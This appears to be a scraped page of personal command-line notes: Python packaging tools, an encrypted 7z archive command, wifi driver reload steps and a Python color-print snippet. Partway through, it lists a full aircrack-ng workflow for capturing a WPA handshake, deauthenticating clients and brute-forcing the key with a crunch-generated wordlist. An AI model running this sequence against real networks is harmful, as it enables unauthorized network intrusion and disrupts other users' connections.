- python
- detox (pip)
- pyenv (AUR)
- virtualenvwrapper (pacman)
- setuptools (optional)
- pandoc (pacman)
- twine (pacman)
Command:
7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p dir.7z dir
Explanation:
a Add (dir1 to archive.7z)
-t7z Use a 7z archive
-m0=lzma2 Use lzma2 method
Get network drive name
$ inxi -n
Unload the module and try the first parameter option
$ sudo modprobe -r rtl8723be
$ sudo modprobe rtl8723be ant_sel=1
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL -w FILENAME --bssid BSSID wlan0mon
aireplay-ng -0 0 -a BSSID wlan0mon
crunch 9 9 0123456789 -t 1231%%%%% | aircrack-ng -w- FILENAME --bssid BSSID
airmon-ng stop wlan0mon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python | |
def cprint(string, color): | |
""" print string with escape code for bash color """ | |
color_code = { | |
'black': '\x1b[30m', | |
'red': '\x1b[31m', | |
'green': '\x1b[32m', | |
'yellow': '\x1b[33m', |
NewerOlder